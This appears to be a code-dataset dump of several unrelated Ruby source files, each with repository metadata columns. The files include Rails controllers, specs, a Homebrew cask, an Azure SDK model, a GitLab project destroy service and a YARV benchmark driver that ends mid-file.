hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
111fe0fa8c279c1e3f08bc221b7955fb03dde728 | 1,287 | require 'yaml'
module Koine
  class TestRunner
    # Builds a TestRunner instance from a YAML configuration file that
    # describes one adapter per named section.
    class Builder
      # arguments must respond to #config_file (path to the YAML config).
      def initialize(arguments)
        initialize_from_yaml_config(arguments.config_file)
      end

      # Returns a TestRunner wired up with the configured adapters.
      def build
        TestRunner.new(@adapters)
      end

      private

      # Loads the config and instantiates one adapter per entry under the
      # 'adapters' key (each entry is a [name, options] pair).
      def initialize_from_yaml_config(config_file)
        config = YAML.load_file(config_file)
        @adapters = config['adapters'].map { |entry| build_adapter(entry.last) }
      end

      # Resolves the 'adapter' option to a class and instantiates it with the
      # remaining options as keyword arguments.  A fully lowercase adapter
      # name is treated as a shorthand for a built-in adapter and expanded
      # into the Koine::TestRunner::Adapters namespace.
      def build_adapter(config)
        adapter_name = config.delete('adapter')
        adapter_class = adapter_name
        if adapter_class.downcase == adapter_class.to_s
          adapter_class = "Koine::TestRunner::Adapters::#{classify(adapter_class)}"
        end
        unless Object.const_defined?(adapter_class)
          raise ArgumentError, "Cannot locate adapter #{adapter_name} => #{adapter_class}"
        end
        Object.const_get(adapter_class).new(**symbolize_keys(config))
      end

      # 'my_adapter' => 'MyAdapter'
      def classify(klass)
        klass.to_s.split('_').map(&:capitalize).join
      end

      # Shallow-converts string hash keys to symbols.
      def symbolize_keys(hash)
        hash.each_with_object({}) { |(key, value), acc| acc[key.to_sym] = value }
      end
    end
  end
end
| 23.833333 | 90 | 0.61927 |
bbe1939171a7b44d470537d4a19b41c1841f121c | 6,978 | #encoding: utf-8
class PhotosController < ApplicationController
before_action :doorkeeper_authorize!, only: [:update],
if: lambda { authenticate_with_oauth? }
before_action :load_record, :only => [:show, :update, :repair, :destroy, :rotate]
before_action :require_owner, :only => [:update, :destroy, :rotate]
before_action :authenticate_user!, except: [:show],
unless: lambda { authenticated_with_oauth? }
before_action :return_here, :only => [:show, :invite, :inviter, :fix]
cache_sweeper :photo_sweeper, :only => [:update, :repair]
def show
@size = params[:size]
@size = "medium" if !%w(small medium large original).include?(@size)
@size = "small" if @photo.send("#{@size}_url").blank?
respond_to do |format|
format.html do
if params[:partial]
partial = (params[:partial] || 'photo').split('/').reject(&:blank?).join('/')
render :layout => false, :partial => partial, :object => @photo, :size => @size
return
end
@taxa = @photo.taxa.limit(100)
@observations = @photo.observations.limit(100)
@flags = @photo.flags
end
format.js do
partial = params[:partial] || 'photo'
render :layout => false, :partial => partial, :object => @photo
end
end
end
def update
if @photo.update_attributes( photo_params( params[:photo] ) )
respond_to do |format|
format.html do
flash[:notice] = t(:updated_photo)
redirect_to @photo.becomes(Photo)
end
format.json do
render json: @photo.as_json
end
end
else
# flash[:error] = t(:error_updating_photo, :photo_errors => @photo.errors.full_messages.to_sentence)
respond_to do |format|
format.html do
flash[:error] = t(:error_updating_photo, :photo_errors => @photo.errors.full_messages.to_sentence)
redirect_to @photo.becomes(Photo)
end
format.json do
render status: :unprocessable_entity, json: { errors: @photo.errors.as_json }
end
end
end
end
def local_photo_fields
# Determine whether we should include synclinks
@synclink_base = params[:synclink_base] unless params[:synclink_base].blank?
respond_to do |format|
format.html do
render partial: "photos/photo_list_form", locals: {
photos: [],
index: params[:index],
synclink_base: @synclink_base,
local_photos: true
}
end
end
end
def destroy
resource = @photo.observations.first || @photo.taxa.first
@photo.destroy
flash[:notice] = t(:photo_deleted)
redirect_back_or_default(resource || '/')
end
def fix
types = %w(FacebookPhoto FlickrPhoto PicasaPhoto)
@type = params[:type]
@type = 'FacebookPhoto' unless types.include?(@type)
@provider_name = @type.underscore.gsub(/_photo/, '')
@provider_identity = if @provider_name == 'flickr'
current_user.has_provider_auth('flickr')
else
current_user.send("#{@provider_name}_identity")
end
@photos = current_user.photos.page(params[:page]).per_page(120).order("photos.id ASC")
@photos = @photos.where(type: @type)
respond_to do |format|
format.html { render layout: 'bootstrap' }
end
end
def repair_all
@type = params[:type] if %w(FlickrPhoto FacebookPhoto PicasaPhoto).include?(params[:type])
if @type.blank?
respond_to do |format|
format.json do
msg = "You must specify a photo type"
flash[:error] = msg
render status: :unprocessable_entity, json: {error: msg}
end
end
return
end
key = "repair_photos_for_user_#{current_user.id}_#{@type}"
delayed_progress(key) do
@job = Photo.delay.repair_photos_for_user(current_user, @type)
end
respond_to do |format|
format.json do
case @status
when "done"
flash[:notice] = "Repaired photos"
render json: {message: "Repaired photos"}
when "error"
flash[:error] = @error_msg
render status: :unprocessable_entity, json: {error: @error_msg}
else
render status: :accepted, json: {message: 'In progress...'}
end
end
end
end
def repair
unless @photo.respond_to?(:repair)
flash[:error] = t(:repair_doesnt_work_for_that_kind_of_photo)
redirect_back_or_default(@photo.becomes(Photo))
return
end
url = @photo.taxa.first || @photo.observations.first || '/'
repaired, errors = Photo.repair_single_photo(@photo)
if repaired.destroyed?
flash[:error] = t(:photo_destroyed_because_it_was_deleted_from, :site_name => @site.site_name_short)
redirect_to url
elsif !errors.blank?
flash[:error] = t(:failed_to_repair_photo, :errors => errors.values.to_sentence)
redirect_back_or_default(@photo.becomes(Photo))
else
flash[:notice] = t(:photo_urls_repaired)
redirect_back_or_default(@photo.becomes(Photo))
end
end
def rotate
unless @photo.is_a?(LocalPhoto)
flash[:error] = t(:you_cant_rotate_photos_hostde_outside, :site_name => @site.site_name_short)
redirect_back_or_default(@photo.becomes(Photo))
end
rotation = params[:left] ? -90 : 90
@photo.rotate!(rotation)
redirect_back_or_default(@photo.becomes(Photo))
end
def create
@photo = LocalPhoto.new( file: params[:file],
user: current_user, mobile: is_mobile_app? )
respond_to do |format|
if [email protected]? && @photo.save
@photo.reload
format.html { redirect_to observations_path }
format.json do
json = @photo.as_json(include: {
to_observation: {
include: { observation_field_values:
{ include: :observation_field, methods: :taxon } },
methods: [ :tag_list ]
} } )
json[:original_url] = @photo.file.url(:original)
json[:large_url] = @photo.file.url(:large)
render json: json
end
else
format.html { redirect_to observations_path }
format.json do
errors = @photo.file.blank? ? { errors: "No photo specified" } : @photo.errors
render json: errors, status: :unprocessable_entity
end
end
end
end
private
def require_owner
unless logged_in? && @photo.editable_by?(current_user)
msg = t(:you_dont_have_permission_to_do_that)
respond_to do |format|
format.html do
flash[:error] = msg
return redirect_to @photo.becomes( Photo )
end
format.json do
return render json: { error: msg }, status: :forbidden
end
end
end
end
def photo_params( options = {} )
p = options.blank? ? params : options
allowed_fields = Photo::MASS_ASSIGNABLE_ATTRIBUTES + [:license, :license_code]
p.permit( allowed_fields )
end
end
| 32.607477 | 108 | 0.6274 |
217f1770302db83331812f5b1afa5f9a842ace7b | 120 | class AddStatusToFollow < ActiveRecord::Migration[5.1]
  # Adds a free-form string +status+ column to the +follows+ table.
  # Using +change+ keeps the migration reversible (Rails derives the
  # corresponding remove_column on rollback).
  def change
    add_column :follows, :status, :string
  end
end
| 20 | 54 | 0.741667 |
e810b7e7e3e5eabd6a8c7fb847cd4e09621f7a6b | 9,863 | require 'spec_helper'
# Request specs for the Cloud Controller v3 /v3/stacks API: list (with
# pagination, name filtering, and label-selector filtering), show, create,
# metadata patch, and delete.
RSpec.describe 'Stacks Request' do
  describe 'GET /v3/stacks' do
    # Remove any seeded stacks so pagination totals below are deterministic.
    before { VCAP::CloudController::Stack.dataset.destroy }
    let(:user) { make_user }
    let(:headers) { headers_for(user) }
    it 'returns 200 OK' do
      get '/v3/stacks', nil, headers
      expect(last_response.status).to eq(200)
    end
    context 'When stacks exist' do
      let!(:stack1) { VCAP::CloudController::Stack.make }
      let!(:stack2) { VCAP::CloudController::Stack.make }
      let!(:stack3) { VCAP::CloudController::Stack.make }
      # Page 1 of 2 with per_page=2: expects stack1 and stack2 plus
      # first/last/next/previous pagination links.
      it 'returns a paginated list of stacks' do
        get '/v3/stacks?page=1&per_page=2', nil, headers
        expect(parsed_response).to be_a_response_like(
          {
            'pagination' => {
              'total_results' => 3,
              'total_pages' => 2,
              'first' => {
                'href' => "#{link_prefix}/v3/stacks?page=1&per_page=2"
              },
              'last' => {
                'href' => "#{link_prefix}/v3/stacks?page=2&per_page=2"
              },
              'next' => {
                'href' => "#{link_prefix}/v3/stacks?page=2&per_page=2"
              },
              'previous' => nil
            },
            'resources' => [
              {
                'name' => stack1.name,
                'description' => stack1.description,
                'guid' => stack1.guid,
                'metadata' => { 'labels' => {}, 'annotations' => {} },
                'created_at' => iso8601,
                'updated_at' => iso8601,
                'links' => {
                  'self' => {
                    'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
                  }
                }
              },
              {
                'name' => stack2.name,
                'description' => stack2.description,
                'guid' => stack2.guid,
                'metadata' => { 'labels' => {}, 'annotations' => {} },
                'created_at' => iso8601,
                'updated_at' => iso8601,
                'links' => {
                  'self' => {
                    'href' => "#{link_prefix}/v3/stacks/#{stack2.guid}"
                  }
                }
              }
            ]
          }
        )
      end
      # ?names= filter: commas are URL-encoded (%2C) in the echoed links.
      it 'returns a list of name filtered stacks' do
        get "/v3/stacks?names=#{stack1.name},#{stack3.name}", nil, headers
        expect(parsed_response).to be_a_response_like(
          {
            'pagination' => {
              'total_results' => 2,
              'total_pages' => 1,
              'first' => {
                'href' => "#{link_prefix}/v3/stacks?names=#{stack1.name}%2C#{stack3.name}&page=1&per_page=50"
              },
              'last' => {
                'href' => "#{link_prefix}/v3/stacks?names=#{stack1.name}%2C#{stack3.name}&page=1&per_page=50"
              },
              'next' => nil,
              'previous' => nil
            },
            'resources' => [
              {
                'name' => stack1.name,
                'description' => stack1.description,
                'guid' => stack1.guid,
                'metadata' => { 'labels' => {}, 'annotations' => {} },
                'created_at' => iso8601,
                'updated_at' => iso8601,
                'links' => {
                  'self' => {
                    'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
                  }
                }
              },
              {
                'name' => stack3.name,
                'description' => stack3.description,
                'guid' => stack3.guid,
                'metadata' => { 'labels' => {}, 'annotations' => {} },
                'created_at' => iso8601,
                'updated_at' => iso8601,
                'links' => {
                  'self' => {
                    'href' => "#{link_prefix}/v3/stacks/#{stack3.guid}"
                  }
                }
              }
            ]
          }
        )
      end
      context 'when there are labels' do
        let!(:stack1_label) { VCAP::CloudController::StackLabelModel.make(
          key_name: 'release',
          value: 'stable',
          resource_guid: stack1.guid
        )
        }
        let!(:stack2_label) { VCAP::CloudController::StackLabelModel.make(
          key_name: 'release',
          value: 'unstable',
          resource_guid: stack2.guid
        )
        }
        # ?label_selector=release=stable should match only stack1; '=' is
        # encoded as %3D in the echoed pagination links.
        it 'returns a list of label filtered stacks' do
          get '/v3/stacks?label_selector=release=stable', nil, headers
          expect(parsed_response).to be_a_response_like(
            {
              'pagination' => {
                'total_results' => 1,
                'total_pages' => 1,
                'first' => {
                  'href' => "#{link_prefix}/v3/stacks?label_selector=release%3Dstable&page=1&per_page=50"
                },
                'last' => {
                  'href' => "#{link_prefix}/v3/stacks?label_selector=release%3Dstable&page=1&per_page=50"
                },
                'next' => nil,
                'previous' => nil
              },
              'resources' => [
                {
                  'name' => stack1.name,
                  'description' => stack1.description,
                  'guid' => stack1.guid,
                  'metadata' => {
                    'labels' => {
                      'release' => 'stable'
                    },
                    'annotations' => {}
                  },
                  'created_at' => iso8601,
                  'updated_at' => iso8601,
                  'links' => {
                    'self' => {
                      'href' => "#{link_prefix}/v3/stacks/#{stack1.guid}"
                    }
                  },
                },
              ]
            }
          )
        end
      end
    end
  end
  describe 'GET /v3/stacks/:guid' do
    let(:user) { make_user }
    let(:headers) { headers_for(user) }
    let!(:stack) { VCAP::CloudController::Stack.make }
    it 'returns details of the requested stack' do
      get "/v3/stacks/#{stack.guid}", nil, headers
      expect(last_response.status).to eq 200
      expect(parsed_response).to be_a_response_like(
        {
          'name' => stack.name,
          'description' => stack.description,
          'guid' => stack.guid,
          'metadata' => { 'labels' => {}, 'annotations' => {} },
          'created_at' => iso8601,
          'updated_at' => iso8601,
          'links' => {
            'self' => {
              'href' => "#{link_prefix}/v3/stacks/#{stack.guid}"
            }
          }
        }
      )
    end
  end
  describe 'POST /v3/stacks' do
    # Stack creation is admin-only.
    let(:user) { make_user(admin: true) }
    let(:request_body) do
      {
        name: 'the-name',
        description: 'the-description',
        metadata: {
          labels: {
            potato: 'yam',
          },
          annotations: {
            potato: 'idaho',
          }
        }
      }.to_json
    end
    let(:headers) { admin_headers_for(user) }
    it 'creates a new stack' do
      expect {
        post '/v3/stacks', request_body, headers
      }.to change {
        VCAP::CloudController::Stack.count
      }.by 1
      created_stack = VCAP::CloudController::Stack.last
      expect(last_response.status).to eq(201)
      expect(parsed_response).to be_a_response_like(
        {
          'name' => 'the-name',
          'description' => 'the-description',
          'metadata' => {
            'labels' => {
              'potato' => 'yam'
            },
            'annotations' => {
              'potato' => 'idaho'
            },
          },
          'guid' => created_stack.guid,
          'created_at' => iso8601,
          'updated_at' => iso8601,
          'links' => {
            'self' => {
              'href' => "#{link_prefix}/v3/stacks/#{created_stack.guid}"
            }
          }
        }
      )
    end
    context 'when there is a model validation failure' do
      let(:name) { 'the-name' }
      before do
        VCAP::CloudController::Stack.make name: name
      end
      # Duplicate name violates the model's uniqueness validation.
      it 'responds with 422' do
        post '/v3/stacks', request_body, headers
        expect(last_response.status).to eq(422)
        expect(last_response).to have_error_message('Name must be unique')
      end
    end
  end
  describe 'PATCH /v3/stacks/:guid' do
    let(:user) { make_user(admin: true) }
    let(:stack) { VCAP::CloudController::Stack.make }
    let(:request_body) do
      {
        metadata: {
          "labels": {
            "potato": 'yam'
          },
          "annotations": {
            "potato": 'idaho'
          }
        }
      }.to_json
    end
    let(:headers) { admin_headers_for(user) }
    it 'updates the metadata of a new stack' do
      patch "/v3/stacks/#{stack.guid}", request_body, headers
      expect(last_response.status).to eq(200)
      expect(parsed_response).to be_a_response_like(
        {
          'name' => stack.name,
          'description' => stack.description,
          'metadata' => {
            'labels' => {
              'potato' => 'yam'
            },
            'annotations' => {
              'potato' => 'idaho'
            },
          },
          'guid' => stack.guid,
          'created_at' => iso8601,
          'updated_at' => iso8601,
          'links' => {
            'self' => {
              'href' => "#{link_prefix}/v3/stacks/#{stack.guid}"
            }
          }
        }
      )
    end
  end
  describe 'DELETE /v3/stacks/:guid' do
    let(:user) { make_user(admin: true) }
    let(:headers) { admin_headers_for(user) }
    let(:stack) { VCAP::CloudController::Stack.make }
    it 'destroys the stack' do
      delete "/v3/stacks/#{stack.guid}", {}, headers
      expect(last_response.status).to eq(204)
      expect(stack).to_not exist
    end
  end
end
| 29.707831 | 109 | 0.440028 |
6195308bdf12bc891ed2ae5b807b358a131d5dc1 | 916 | Pod::Spec.new do |s|
  # CocoaPods spec for FontasticIcons, an Objective-C wrapper for iconic fonts.
  s.name = 'FontasticIcons'
  s.version = '0.2.1'
  s.summary = 'Objective-C wrapper for iconic fonts.'
  s.description = <<-DESC
- [Entypo](http://entypo.com) pictograms by Daniel Bruce.
- [FontAwesome](http://fortawesome.github.com/Font-Awesome/) by Dave Gandy.
- [Iconic](http://somerandomdude.com/work/iconic/) font by P.J. Onori.
DESC
  s.homepage = 'https://github.com/AlexDenisov/FontasticIcons'
  s.license = 'MIT'
  s.author = { 'Alex Denisov' => '[email protected]' }
  # Tag name is derived from the pod version so releases stay in sync.
  s.source = { :git => 'https://github.com/AlexDenisov/FontasticIcons.git', :tag => "#{s.version}" }
  s.platform = :ios, '3.2'
  s.source_files = 'FontasticIcons/Sources/Classes'
  # Bundled font files shipped as resources.
  s.resources = 'FontasticIcons/Sources/Resources/Fonts/*'
  s.frameworks = 'CoreText', 'QuartzCore'
end
| 48.210526 | 106 | 0.590611 |
6a16f55f92a6a56c2aad1bd4beda50d183c0b27f | 239 | cask :v1 => 'faux-pas' do
  # Homebrew Cask (v1 DSL) for the Faux Pas Xcode linting app.
  # The vendor serves a rolling "latest" download, so there is no pinned
  # version and no checksum to verify.
  version :latest
  sha256 :no_check
  url 'http://api.fauxpasapp.com/download_latest'
  appcast 'http://api.fauxpasapp.com/appcast'
  homepage 'http://fauxpasapp.com'
  license :unknown
  app 'FauxPas.app'
end
| 19.916667 | 49 | 0.707113 |
395a6f1ab98f82e2e4cd9cfb0227aff0951af286 | 2,182 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Batch::Mgmt::V2018_12_01
  module Models
    #
    # Model object.
    #
    # Base properties shared by Batch certificate payloads: the thumbprint
    # algorithm, the thumbprint itself, and the certificate format.
    # NOTE: auto-generated by AutoRest — edits here will be lost on
    # regeneration.
    #
    class CertificateBaseProperties
      include MsRestAzure
      # @return [String] The algorithm of the certificate thumbprint. This must
      # match the first portion of the certificate name. Currently required to
      # be 'SHA1'.
      attr_accessor :thumbprint_algorithm
      # @return [String] The thumbprint of the certificate. This must match the
      # thumbprint from the name.
      attr_accessor :thumbprint
      # @return [CertificateFormat] The format of the certificate - either Pfx
      # or Cer. If omitted, the default is Pfx. Possible values include: 'Pfx',
      # 'Cer'
      attr_accessor :format
      #
      # Mapper for CertificateBaseProperties class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'CertificateBaseProperties',
          type: {
            name: 'Composite',
            class_name: 'CertificateBaseProperties',
            model_properties: {
              thumbprint_algorithm: {
                client_side_validation: true,
                required: false,
                serialized_name: 'thumbprintAlgorithm',
                type: {
                  name: 'String'
                }
              },
              thumbprint: {
                client_side_validation: true,
                required: false,
                serialized_name: 'thumbprint',
                type: {
                  name: 'String'
                }
              },
              format: {
                client_side_validation: true,
                required: false,
                serialized_name: 'format',
                type: {
                  name: 'Enum',
                  module: 'CertificateFormat'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 28.710526 | 79 | 0.539872 |
6ace21cf53b25fa187cae27b3059931fe159d8eb | 367 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2018_04_19
  module Models
    #
    # Defines values for ProjectTargetPlatform
    #
    # NOTE: auto-generated by AutoRest — edits here will be lost on
    # regeneration.
    module ProjectTargetPlatform
      SQLDB = "SQLDB"
      Unknown = "Unknown"
    end
  end
end
| 22.9375 | 70 | 0.711172 |
0320a0c8c3fe10b777617162d703aa76df22040d | 359 | # frozen_string_literal: true
# ViewComponent previews for PreviewComponent, shown in the component
# preview UI (default, CTA-less, and block-content variants).
class PreviewComponentPreview < ViewComponent::Preview
  def default
    render(PreviewComponent.new(cta: "Click me!", title: "Lorem Ipsum"))
  end
  # Exercises the component without a call-to-action.
  def without_cta
    render(PreviewComponent.new(title: "More lorem..."))
  end
  # Exercises the component with block content passed through.
  def with_content
    render(PreviewComponent.new(title: "title")) { "some content" }
  end
end
| 22.4375 | 72 | 0.721448 |
61ec3c2a41ca54c2a2621ce84f46af636e837836 | 1,552 | require 'test/unit'
# Minimal stand-in for ActionController::Base so the tests below can run
# without loading Rails.
module ActionController; end

class ActionController::Base
  # Name of the action extracted from the most recent request.
  attr_reader :action_name

  # Mirrors the Rails class-level entry point: instantiate and delegate.
  def self.process(request, response)
    new.process(request, response)
  end

  # Records the requested action name from the request's parameters hash.
  def process(request, _response)
    @action_name = request.parameters['action']
  end

  # Demodulized class name, e.g. "Nested::MyController" -> "MyController".
  def controller_class_name
    self.class.name.split('::').last
  end
end
require 'rails_remote_control/process'
# Base controller that mixes in the remote-control instrumentation under
# test (RailsRemoteControl::Process, from rails_remote_control/process).
class ApplicationController < ActionController::Base
  include RailsRemoteControl::Process
end
# Fixture controller with two empty actions, used to exercise per-action
# request counting in the tests below.
class MyController < ApplicationController
  def index
  end
  def show
  end
end
# Namespaced fixture controller, used to verify that request keys include
# the full module path ("Nested::MyController#index").
module Nested; end
class Nested::MyController < ApplicationController
  def index
  end
  def show
  end
end
module RailsRemoteControl
  # Test-only helper: resets the module-level counters and the per-action
  # request map between test cases.
  # NOTE(review): assumes Process stores its state in @requests_handled,
  # @requests_attempted, and @requests — defined in
  # rails_remote_control/process, not visible here.
  def Process.reset
    @requests_handled = 0
    @requests_attempted = 0
    @requests.clear
  end
end
# Verifies that processing a request through an instrumented controller
# increments the handled/attempted counters and records a
# "Controller#action" key.
class TestRailsRemoteControlProcess < Test::Unit::TestCase
  RRCP = RailsRemoteControl::Process
  # Quacks like an ActionController request: responds to #parameters.
  FakeRequest = Struct.new :parameters
  def setup
    @request = FakeRequest.new
    @request.parameters = { 'action' => 'index' }
  end
  def teardown
    RRCP.reset
  end
  def test_process
    MyController.new.process @request, nil
    assert_equal 1, RRCP.requests_handled
    assert_equal 1, RRCP.requests_attempted
    expected = { 'MyController#index' => 1 }
    assert_equal expected, RRCP.requests
  end
  # Namespaced controllers must be recorded under their full module path.
  def test_process_nested
    Nested::MyController.new.process @request, nil
    assert_equal 1, RRCP.requests_handled
    expected = { 'Nested::MyController#index' => 1 }
    assert_equal expected, RRCP.requests
  end
end
| 16.510638 | 58 | 0.724227 |
7af994d1ba5f8603cdcb45c2acc4d774542e2735 | 1,851 | #!/usr/local/bin/ruby
# -*- coding: utf-8 -*-
puts 1 + 2 # prints 3
# <=> is the combined comparison (spaceship) operator: returns 0 when the
# operands are equal, 1 when the left is greater, -1 when it is smaller.
puts 1 <=> 2 # prints -1
# === is the case-equality operator used by `when` clauses; Range#=== tests
# membership.
puts (1..10) === 5 # prints true
# .eql? returns true only when receiver and argument have the same type AND
# equal values, so Integer vs Float differs from ==.
puts 1 == 1.0 # true
puts 1.eql?(1.0) # false
# equal? returns true only when receiver and argument are the same object
# (identical object id).
# Parallel assignment (example kept commented out):
=begin
a, b, c = 10, 20, 30
a, b = b, c
=end
# Range operators: .. is inclusive, ... excludes the end value.
puts (1..10) # inclusive range 1..10
puts (1...10) # exclusive range 1...9
# The defined? operator: reports whether an expression is defined, returning
# a descriptive string, or nil when it is not.
defined? variable # true-ish only if `variable` has been initialized
foo = 42
defined? foo # => "local-variable"
defined? $_ # => "global-variable"
defined? bar # => nil (undefined)
defined? method_call # true-ish if the method is defined
defined? puts # => "method"
defined? puts(bar) # => nil (bar is undefined here)
defined? unpack # => nil (undefined here)
# True-ish if there is a method callable via super
defined? super # => "super" (when callable)
defined? super # => nil (when not callable)
defined? yield # => "yield" (when a block was passed)
defined? yield # => nil (when no block was passed)
# Dot operator . and double-colon operator ::
# Methods in a class or module are invoked by prefixing the method name with
# the class/module name and a dot; constants are referenced with ::.
# A leading :: is a unary operator that resolves constants, instance
# methods, and class methods at the top level, reachable from anywhere.
MR_COUNT = 0 # constant defined on the main Object class
module Foo
  MR_COUNT = 0
  ::MR_COUNT = 1 # reassigns the top-level constant to 1 (warns)
  MR_COUNT = 2 # reassigns the module-local constant to 2 (warns)
end
puts MR_COUNT # the global (top-level) constant
puts Foo::MR_COUNT # the constant local to "Foo"
CONST = " out there"
class Inside_one
  CONST = proc { " in there" }
  def where_is_my_CONST
    # Leading :: forces lookup of the TOP-LEVEL constant, not the class's.
    ::CONST + " inside one"
  end
end
class Inside_two
  CONST = " inside two"
  def where_is_my_CONST
    # Unqualified lookup finds the constant defined in this class.
    CONST
  end
end
puts Inside_one.new.where_is_my_CONST
puts Inside_two.new.where_is_my_CONST
puts Object::CONST + Inside_two::CONST
puts Inside_two::CONST + CONST
puts Inside_one::CONST
puts Inside_one::CONST.call + Inside_two::CONST
| 20.797753 | 81 | 0.662345 |
1ccec6595cbef86b834cd4fa2900b7b7a6255280 | 1,085 | require 'utils/value_stringifier'
module ActiveFlags
class Flag < ApplicationRecord
belongs_to :subject, polymorphic: true
validates :subject, :key, :value, presence: true
validates :key, uniqueness: { scope: :subject }
after_save :notify_subject_flag_has_changed, if: proc { |flag| flag.saved_changes.key?('value') }
def notify_subject_flag_has_changed
subject.flag_has_changed(key, value) if subject&.respond_to?(:flag_has_changed)
true
end
def removing_duplicated_needed?
ActiveFlags::Flag.where(subject: subject, key: key).any?
end
def removing_duplicated_flags!
return false unless removing_duplicated_needed?
grouped = ActiveFlags::Flag
.where(subject_id: subject_id, subject_type: subject_type, key: key)
.group_by { |model| [model.key, model.subject_id, model.subject_type] }
grouped.values.each do |duplicates|
duplicates.shift
duplicates.each(&:destroy)
end
true
end
def converted_value
self.value = unstringify(value)
end
end
end
| 29.324324 | 101 | 0.700461 |
e2b2660ea71702d20fadd136252580e48cf56ad2 | 3,481 | module Projects
# Destroys a project: database records, container registry tags, and the
# project + wiki git repositories (which are renamed aside first and removed
# asynchronously).
class DestroyService < BaseService
  include Gitlab::ShellAdapter
  DestroyError = Class.new(StandardError)
  DELETED_FLAG = '+deleted'.freeze
  # Marks the project pending-delete and schedules the real destruction in a
  # background worker.
  def async_execute
    project.update_attribute(:pending_delete, true)
    job_id = ProjectDestroyWorker.perform_async(project.id, current_user.id, params)
    Rails.logger.info("User #{current_user.id} scheduled destruction of project #{project.path_with_namespace} with job ID #{job_id}")
  end
  # Performs the destruction synchronously.  Returns false when the user
  # lacks permission; raises DestroyError when a cleanup step fails (which
  # rolls back the surrounding transaction).
  def execute
    return false unless can?(current_user, :remove_project, project)
    repo_path = project.path_with_namespace
    wiki_path = repo_path + '.wiki'
    # Flush the cache for both repositories. This has to be done _before_
    # removing the physical repositories as some expiration code depends on
    # Git data (e.g. a list of branch names).
    flush_caches(project, wiki_path)
    Projects::UnlinkForkService.new(project, current_user).execute
    Project.transaction do
      project.team.truncate
      project.destroy!
      unless remove_legacy_registry_tags
        raise_error('Failed to remove some tags in project container registry. Please try again or contact administrator.')
      end
      unless remove_repository(repo_path)
        raise_error('Failed to remove project repository. Please try again or contact administrator.')
      end
      unless remove_repository(wiki_path)
        raise_error('Failed to remove wiki repository. Please try again or contact administrator.')
      end
    end
    log_info("Project \"#{project.path_with_namespace}\" was removed")
    system_hook_service.execute_hooks_for(project, :destroy)
    true
  end
  private
  # Renames the repository at +path+ aside and schedules its physical
  # removal a few minutes later.  Returns true when there is nothing to do.
  def remove_repository(path)
    # Skip repository removal. We use this flag when remove user or group
    return true if params[:skip_repo] == true
    # There is a possibility project does not have repository or wiki
    return true unless gitlab_shell.exists?(project.repository_storage_path, path + '.git')
    new_path = removal_path(path)
    if gitlab_shell.mv_repository(project.repository_storage_path, path, new_path)
      log_info("Repository \"#{path}\" moved to \"#{new_path}\"")
      project.run_after_commit do
        # self is now project
        GitlabShellWorker.perform_in(5.minutes, :remove_repository, self.repository_storage_path, new_path)
      end
    else
      false
    end
  end
  ##
  # This method makes sure that we correctly remove registry tags
  # for legacy image repository (when repository path equals project path).
  #
  def remove_legacy_registry_tags
    return true unless Gitlab.config.registry.enabled
    ContainerRepository.build_root_repository(project).tap do |repository|
      return repository.has_tags? ? repository.delete_tags! : true
    end
  end
  # Wraps a failure message in DestroyError (aborts the transaction).
  def raise_error(message)
    raise DestroyError.new(message)
  end
  # Build a path for removing repositories
  # We use `+` because its not allowed by GitLab so user can not create
  # project with name cookies+119+deleted and capture someone stalled repository
  #
  # gitlab/cookies.git -> gitlab/cookies+119+deleted.git
  #
  def removal_path(path)
    "#{path}+#{project.id}#{DELETED_FLAG}"
  end
  # Expires cached data for the project repository and its wiki.
  def flush_caches(project, wiki_path)
    project.repository.before_delete
    Repository.new(wiki_path, project).before_delete
  end
end
end
| 32.839623 | 136 | 0.700948 |
e931966cca57bd7831adb258da2f0dc03afefe4c | 1,335 | #
# YARV benchmark driver
#
require 'yarvutil'
require 'benchmark'
require 'rbconfig'
# Builds the Ruby source for one benchmark run.  The generated program loads
# +file+ through the loader call named by +w+ ("load" for plain Ruby,
# "YARVUtil.load_bm" for YARV), measures user CPU time with Benchmark, and
# prints it; on failure it prints a tab-prefixed error message instead.
# +type+ is only referenced by the commented-out progress print inside the
# generated code.  (Heredoc body is part of the generated program — do not
# add comments inside it.)
def exec_command type, file, w
<<-EOP
$DRIVER_PATH = '#{File.dirname($0)}'
$LOAD_PATH.replace $LOAD_PATH | #{$LOAD_PATH.inspect}
require 'benchmark'
require 'yarvutil'
# print '#{type}'
begin
puts Benchmark.measure{
#{w}('#{file}')
}.utime
rescue Exception => exec_command_error_variable
puts "\t" + exec_command_error_variable.message
end
EOP
end
# Pipes +cmd+ into a freshly spawned Ruby interpreter (ENV['RUBY'] or the
# interpreter from RbConfig) and returns the first line the child prints,
# or nil when it prints nothing.
def benchmark cmd
  interpreter = ENV['RUBY'] || File.join(
    RbConfig::CONFIG["bindir"],
    RbConfig::CONFIG["ruby_install_name"] + RbConfig::CONFIG["EXEEXT"]
  )
  IO.popen(interpreter, 'r+') do |child|
    child.write(cmd)
    child.close_write
    # `return` inside the block exits benchmark itself with the first line.
    return child.gets
  end
end
# Benchmarks +file+ under plain Ruby (loaded via Kernel#load).
def ruby_exec file
  benchmark(exec_command('ruby', file, 'load'))
end
# Benchmarks +file+ under YARV (loaded via YARVUtil.load_bm).
def yarv_exec file
  benchmark(exec_command('yarv', file, 'YARVUtil.load_bm'))
end
# Scratch globals (unused below; presumably leftovers — TODO confirm).
$wr = $wy = nil
# Runs bm_<bench>.rb (located next to this driver) under both interpreters
# and prints "<bench>\t<ruby time>\t<yarv time>".
def measure bench
  file = File.dirname($0) + "/bm_#{bench}.rb"
  r = ruby_exec(file).to_f
  y = yarv_exec(file).to_f
  puts "#{bench}\t#{r}\t#{y}"
end
# Prints the ruby/yarv time ratio.
# FIXME: dead/broken — ruby_exec and yarv_exec require a file argument, so
# calling them with no arguments raises ArgumentError.  Nothing in this
# file calls measure2.
def measure2
  r = ruby_exec.to_f
